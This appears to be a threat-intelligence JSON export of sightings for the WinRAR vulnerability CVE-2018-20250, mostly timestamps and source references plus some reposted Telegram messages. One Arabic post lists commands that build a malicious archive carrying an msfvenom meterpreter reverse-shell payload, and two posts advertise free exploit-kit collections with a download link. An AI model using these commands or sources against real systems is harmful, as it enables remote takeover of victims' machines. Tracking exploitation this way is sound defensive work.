{"vulnerability": "CVE-2018-20250", "sightings": [{"uuid": "f342fc28-1bb0-47fd-9a9b-b48131223383", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/5e18639d-9f54-4ad1-8c3c-4ab102de0b81", "content": "", "creation_timestamp": "2020-01-10T11:45:42.000000Z"}, {"uuid": "e5c2946a-e643-4343-ae66-5b9b5992f6de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/5e25a007-6b88-42a0-bf0e-1a3e0a3b4631", "content": "", "creation_timestamp": "2020-01-20T13:12:20.000000Z"}, {"uuid": "653ae6a5-69c9-4941-816e-810f872c2c1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/d3f94f7a-19df-478a-bf7d-caaafb346b95", "content": "", "creation_timestamp": "2020-10-09T15:29:52.000000Z"}, {"uuid": "a720e36f-5159-4a7c-8d69-d841e62b8e3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/c135eccb-97f4-4042-b307-d44cdae18211", "content": "", "creation_timestamp": "2020-10-09T13:27:32.000000Z"}, {"uuid": "2417b632-7f2d-4bc1-91a3-0575784a7e9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-2025010", "type": "seen", "source": "MISP/c135eccb-97f4-4042-b307-d44cdae18211", "content": "", "creation_timestamp": "2020-10-09T13:27:38.000000Z"}, {"uuid": "1c27a52a-46a5-4fc8-a256-a9f2a67b36b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/44968099-2333-4079-a5fa-ce80eb06618e", "content": "", "creation_timestamp": "2020-10-09T15:29:57.000000Z"}, {"uuid": "7c320ce9-cb2f-407b-8a1f-09b7b4a760ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/fd9a1e79-43f2-401b-a52e-0dafe1e63487", "content": "", "creation_timestamp": "2020-10-09T15:25:40.000000Z"}, {"uuid": "abcb9cab-dc39-47c7-bb37-7e82465867bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/0c14b3ef-9e1e-4060-8626-5e1e5c43b5db", "content": "", "creation_timestamp": "2020-10-09T14:39:28.000000Z"}, {"uuid": "2896ae81-b51b-4548-87f4-2cdf296dbcd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/e64acd7a-b7af-49f6-a917-14621f8d4e4d", "content": "", "creation_timestamp": "2020-10-09T15:38:33.000000Z"}, {"uuid": "fd551937-0b1c-444d-bcae-d85fa9333292", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/5202189a-9fe4-439b-86ca-b83d6a25ef77", "content": "", "creation_timestamp": "2020-10-09T15:44:30.000000Z"}, {"uuid": "1ebfd9a1-2fcc-40dc-9df9-2a0ffe5a6053", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/90b6ecdb-0b9a-4b08-a214-839bcfdf824a", "content": "", "creation_timestamp": "2020-10-09T15:40:53.000000Z"}, {"uuid": "d7fcbbac-3b03-4c96-92f2-33a2242a69f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:03.000000Z"}, {"uuid": "4592ee65-8bb9-4b0d-afdc-def745219fbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "exploited", "source": "https://www.exploit-db.com/exploits/46552", "content": "", "creation_timestamp": "2019-02-22T00:00:00.000000Z"}, {"uuid": "2328b490-0c8f-48c8-85e4-4e614598f349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "exploited", "source": "https://www.exploit-db.com/exploits/46756", "content": "", "creation_timestamp": "2019-04-25T00:00:00.000000Z"}, {"uuid": "ec037916-454e-4bb8-9085-c7cc102472aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:43.000000Z"}, {"uuid": "91a5f6d1-0b26-4e85-a649-1ad233c9a158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971257", "content": "", "creation_timestamp": "2024-12-24T20:26:36.499848Z"}, {"uuid": "021e398b-cc17-4ef6-bd72-512cd53992a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/winrar_ace.rb", "content": "", "creation_timestamp": "2019-04-24T10:54:55.000000Z"}, {"uuid": "14aef464-8581-4e94-bdee-290f0b9ca1e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:19.000000Z"}, {"uuid": "d725e092-f6ef-478e-85b5-8969bdf16685", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:00:55.000000Z"}, {"uuid": "03c6be74-6cd5-4328-8191-22e9ed803ce2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:07.000000Z"}, {"uuid": "1c3397d7-d1e4-4bba-a4e0-e5abd6c56b81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2018-20250", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/7722a648-154b-4006-966c-45042d47b41c", "content": "", "creation_timestamp": "2026-02-02T12:28:23.207178Z"}, {"uuid": "9ab0a9f5-317a-4129-8f39-7f5b46f18a37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "published-proof-of-concept", "source": "https://t.me/antichat/4374", "content": "Analysis of a targeted attack exploiting the WinRar CVE-2018-20250 vulnerability\nhttps://www.microsoft.com/security/blog/2019/04/10/analysis-of-a-targeted-attack-exploiting-the-winrar-cve-2018-20250-vulnerability/", "creation_timestamp": "2019-04-10T21:31:08.000000Z"}, {"uuid": "f0640963-ed08-49c5-82d2-c81faf7da9c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "exploited", "source": "https://t.me/codeby_sec/3877", "content": "\u200b\u200b\u041e\u0441\u0442\u043e\u0440\u043e\u0436\u043d\u043e \u2013 WinRAR!\n\n\u0427\u0435\u043c \u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0437\u043b\u043e\u0434\u0435\u0438 \u0438 \u0434\u0430\u0436\u0435 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u044b ))). \u041e\u043d\u0438 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0441 \u0443\u0441\u043f\u0435\u0445\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0432 WinRAR . \u0427\u0442\u043e, \u043a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u0434\u0435\u043b\u0430\u0435\u0442 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u044b \u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0434\u043b\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a. \u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2018-20250), \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0432 \u043a\u043e\u043d\u0446\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u043c\u0435\u0441\u044f\u0446\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 WinRAR \u0441 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c WinRAR \u0432\u0435\u0440\u0441\u0438\u0438 5.70 beta 1, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 WinRAR, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 19 \u043b\u0435\u0442.\n\n\u0427\u0438\u0442\u0430\u0442\u044c: https://codeby.net/threads/ostorozhno-winrar.67344/\n\n#winrar #exploit", "creation_timestamp": "2020-12-22T17:17:00.000000Z"}, {"uuid": "deaf0253-a4cd-4576-9c71-22c1443e5f01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "exploited", "source": "https://t.me/ExcreamOnSecurity/54", "content": "Analysis of a targeted attack exploiting the WinRAR CVE-2018-20250 vulnerability\n\nThe WinRAR vulnerability was discovered by Check Point researchers, who demonstrated in a February 20 blog post that a specially crafted ACE file (a type of compressed file) could allow remote code execution. Attackers quickly took advantage of the vulnerability in attacks, including a targeted attack that 360 Total Security researchers discovered just two days after disclosure. The exploit has since been observed in multiple malware attacks.\n\nhttps://www.microsoft.com/security/blog/2019/04/10/analysis-of-a-targeted-attack-exploiting-the-winrar-cve-2018-20250-vulnerability/\n#exploit #winrar", "creation_timestamp": "2019-04-14T19:55:30.000000Z"}, {"uuid": "4bf8b29c-5cc2-4bb9-9a88-ed131c691af5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "https://t.me/is_n3ws/34", "content": "\u200c\u041a\u043e\u043c\u0430\u043d\u0434\u0430 Recorded Future \u043f\u0440\u043e\u0448\u0435\u0440\u0441\u0442\u0438\u043b\u0430 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438, \u0434\u0430\u0440\u043a\u0432\u0435\u0431 \u0438 \u0441\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u0441\u043f\u0438\u0441\u043e\u043a \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0447\u0430\u0441\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e \u0433\u043e\u0434\u0430\u043c.\u00a0\n\n\n\u200b\u200bCVE-2018-15982\nis a use-after-free in the Flash\u2019s file package com.adobe.tvsdk.mediacore.metadata that can be exploited to deliver and execute malicious code on a victim\u2019s computer. Exploit vector: rtf document with flash object.\n\nCVE-2018-8174\nWindows VBScript Engine Remote Code Execution Vulnerability. Exploit vector:\u00a0 An attacker could embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document.\n\nCVE-2017-11882\nVulnerability in an older version of the Office Equation Editor. Exploit vector: RTF file downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload.\n\nCVE-2018-4878\nFlash Player vulnerability. Exploit vector: The Excel file carrying an embedded SWF file with the exploit.\n\nCVE-2019-0752\nA remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. Exploit vector: In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the IE rendering engine.\n\nCVE-2017-0199\nMS Office zero-day vulnerability. Exploit vector: Microsoft Word RTF (Rich Text Format) document.\n\nCVE-2015-2419\nJScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"JScript9 Memory Corruption Vulnerability.\"\n\nCVE-2018-20250\nWinRAR vulnerability that allows attackers to extract a malicious executable to one of the Windows Startup folder to be executed every time the system is booted.\n\nCVE-2017-8750\nA remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory.\u00a0 Exploit vector: An attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers.\n\nCVE-2012-0158\nA buffer overflow vulnerability in the\u00a0 ListView / TreeView ActiveX controls in the MSCOMCTL.OCX library. The malicious code can be triggered by a specially crafted DOC or RTF file for MS Office versions 2003, 2007 and 2010.\n\nhttps://www.helpnetsecurity.com/2020/02/06/most-exploited-vulnerabilities-2019/", "creation_timestamp": "2020-02-07T07:05:41.000000Z"}, {"uuid": "4aa40673-97a9-420a-ac3b-af6d45c35761", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "exploited", "source": "https://t.me/information_security_channel/25668", "content": "Goldmouse APT group (APT-C-27) now start exploiting the WinRAR vulnerability (CVE-2018-20250[6]) to hide the njRAT backdoor and targeting users reside in the Middle East via decoy Word document to compromise and control the device. The 19-year-old vulnerability\u00a0was disclosed by checkpoint security researchers last week, the vulnerability\u00a0resides in the WinRAR UNACEV2.DLL library. Since the vulnerability has [\u2026]\nThe post APT-C-27 Hackers Launching njRAT Backdoor via Weaponized Word Documents to Control the Compromised Device (https://gbhackers.com/apt-c-27-hackers-launching-njrat-backdoor/) appeared first on GBHackers On Security (https://gbhackers.com/).", "creation_timestamp": "2019-03-20T05:01:35.000000Z"}, {"uuid": "2ca5d687-79b6-4438-bedf-3b5526da176a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "published-proof-of-concept", "source": "https://t.me/Hacktivist_Vanguard/1407", "content": "\ud83d\udd77:  BIG EXPLOIT COLLECTION 2024 \ud83e\udd87\n\n1. 0day exploit (.doc) in Microsoft office 2018-2019\n2. Agent Tesla Exploit\n3. Ancalog Exploit Builder\n4. Beps\n5. Crimepack ExploitKit 3.1.3\n6. DemonHunter Exploitkit\n7. Exploit .doc Builder\n8. Exploit Kit Shadyantra\n9. OEBuilder\n10. OLE Doc Exploit (Embedded) + FUD.DOC Exploit (2019)\n11. PDF Exploit\n12. Pdf Exploit Builder\n13. Sava Exploits Pack\n14. WinRar CVE-2018-20250 Exploit\n\ud83d\ude2d  DM : @ToxicLizard_bot  \u2622\ufe0f", "creation_timestamp": "2024-06-13T10:33:18.000000Z"}, {"uuid": "78b82bf0-1ebf-4d45-a81d-48fa9caab3f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "published-proof-of-concept", "source": "https://t.me/hack_room_channel/192", "content": "Doc-PDF-exploit-collection\n\n\nhttps://github.com/mave12/Doc-PDF-exploit-collection/blob/main/exploit%20coll.rar?raw=true\n\n\ud83d\udc49\ud83c\udffb  0day exploit (.doc) in microsoft office (2018-19)\n\n\ud83d\udc49\ud83c\udffb  Agent-Tesla-Exploit-master\n\n\ud83d\udc49\ud83c\udffb  Ancalog Exploit Builder\n\n\ud83d\udc49\ud83c\udffb  Exploit .doc Builder\n\n\ud83d\udc49\ud83c\udffb  OEBuilder_Cracked by Artist\n\n\ud83d\udc49\ud83c\udffb  OLE Doc Exploit (Embedded) + FUD.DOC Exploit (2019)\n\n\ud83d\udc49\ud83c\udffb  PDF Exploit\n\n\ud83d\udc49\ud83c\udffb  Pdf Exploit Builder\n\n\ud83d\udc49\ud83c\udffb  WinRar CVE-2018-20250 Exploit", "creation_timestamp": "2022-01-30T11:44:41.000000Z"}, {"uuid": "156bb321-3d95-4b52-b363-eb09c9274697", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "published-proof-of-concept", "source": "https://t.me/pwnwiki_zhchannel/290", "content": "CVE-2018-20250 WinRAR\u76ee\u9304\u7a7f\u8d8a\u6f0f\u6d1e\nhttps://www.pwnwiki.org/index.php?title=CVE-2018-20250_WinRAR%E7%9B%AE%E9%8C%84%E7%A9%BF%E8%B6%8A%E6%BC%8F%E6%B4%9E", "creation_timestamp": "2021-05-01T03:53:10.000000Z"}, {"uuid": "fd9a6564-4547-4ef8-b32c-107d778098a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "published-proof-of-concept", "source": "https://t.me/ctinow/10233", "content": "Analysis of a targeted attack exploiting the WinRar CVE-2018-20250 vulnerability\n\nhttp://bit.ly/2UOickB", "creation_timestamp": "2019-04-10T17:08:04.000000Z"}, {"uuid": "58adb493-9bdd-4283-8ef8-9b58f05f2801", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "published-proof-of-concept", "source": "https://t.me/CipherAgents/1292054", "content": "BIG EXPLOIT COLLECTION 2024\n\n1. 0day exploit (.doc) in Microsoft office 2018-2019\n2. Agent Tesla Exploit\n3. Ancalog Exploit Builder\n4. Beps\n5. Crimepack ExploitKit 3.1.3\n6. DemonHunter Exploitkit\n7. Exploit .doc Builder\n8. Exploit Kit Shadyantra\n9. OEBuilder\n10. OLE Doc Exploit (Embedded) + FUD.DOC Exploit (2019)\n11. PDF Exploit\n12. Pdf Exploit Builder\n13. Sava Exploits Pack\n14. WinRar CVE-2018-20250 Exploit\n\nPrice- Free For Uh \n\nhttps://mega.nz/file/IqM3RLrJ#G2S_tA7BZwWOtiAzndzbM7RQoDZYxdIzkJeleM11Thc\n\n#\ud835\ude41\ud835\ude3c\ud835\ude47\ud835\ude3e\ud835\ude4a\ud835\ude49_\ud835\ude4e\ud835\ude40\ud835\ude3e #\ud835\ude4f\ud835\ude40\ud835\ude3c\ud835\ude48_\ud835\ude44\ud835\ude49\ud835\ude3f", "creation_timestamp": "2024-06-14T12:57:53.000000Z"}, {"uuid": "873cea5d-33de-4902-bfe8-38a677702e76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "exploited", "source": "https://t.me/DC8044_Info/97", "content": "WinRAR vulnerability: PoC file of extracting-code-execution-from-winrar, CVE-2018-20250\nhttps://github.com/Ridter/acefile", "creation_timestamp": "2019-02-21T09:29:06.000000Z"}, {"uuid": "dbc146c2-f323-4c9d-bb65-647503d29a88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "exploited", "source": "https://t.me/canyoupwnme/5386", "content": "Analysis of a targeted attack exploiting the WinRar CVE-2018-20250 vulnerability\nhttps://www.microsoft.com/security/blog/2019/04/10/analysis-of-a-targeted-attack-exploiting-the-winrar-cve-2018-20250-vulnerability/", "creation_timestamp": "2019-04-10T21:56:45.000000Z"}, {"uuid": "5454e8b5-dac6-48a0-80ec-69b3b22e0d6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "Telegram/V1HdJIL4JCLUEE5wbCfm6IRtLRhhrscJwVVe9_woeQfAQwed", "content": "", "creation_timestamp": "2021-08-17T13:01:03.000000Z"}, {"uuid": "23a19d6b-7e4a-45fc-a2f3-a2e8a1f98a59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "published-proof-of-concept", "source": "https://t.me/CybNux/6061", "content": "\u062a\u062d\u0630\u064a\u0631 \u062b\u063a\u0631\u0629 \u0641\u064a Winrar \u0625\u0635\u062f\u0627\u0631 v5.21 \u0648\u064a\u0645\u0643\u0646 \u0644\u0644\u062c\u0645\u064a\u0639 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \ud83d\ude32\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\n\u26aa\ufe0f \u0643\u0644 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0628\u0627\u0644\u062a\u0631\u062a\u064a\u0628 :\n\ngit clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git\ncd Evil-WinRAR-Gen/\npip3 install -r requirements.txt\n\n\nchmod 777 evilWinRAR.py\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=1234 -f exe > winrar.exe\n\n\npython evilWinRAR.py -e winrar.exe -g winrar.txt\n\npython -m SimpleHTTPServer 8080\n\n\nshell:startup\n\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\n\u26aa\ufe0f \u0623\u0631\u0642\u0627\u0645 \u0628\u064a\u0646\u0627\u062a CVE :\n\ncve-2018-20250\ncve-2018-20251 \ncve-2018-20252 \ncve-2018-20253", "creation_timestamp": "2024-03-30T06:03:17.000000Z"}, {"uuid": "cec0a702-b40a-4597-bbc7-761e39920a27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2018-20250", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/202", "content": "#exploit\n1. CVE-2019-8917:\nRemote Windows Communication Foundation (WCF) Exploitation\nhttps://versprite.com/blog/security-research/exploitation-of-remote-services\n\n2. CVE-2019-5514:\nVMware Fusion 11 - Guest VM RCE\nhttps://theevilbit.github.io/posts/vmware_fusion_11_guest_vm_rce_cve-2019-5514\n\n3. CVE-2018-20250:\nExtracting a 19 Year Old Code Execution from WinRAR\nhttps://research.checkpoint.com/2019/extracting-code-execution-from-winrar\n]-> PoC:  https://github.com/WyAtu/CVE-2018-20250", "creation_timestamp": "2022-06-18T11:46:01.000000Z"}]}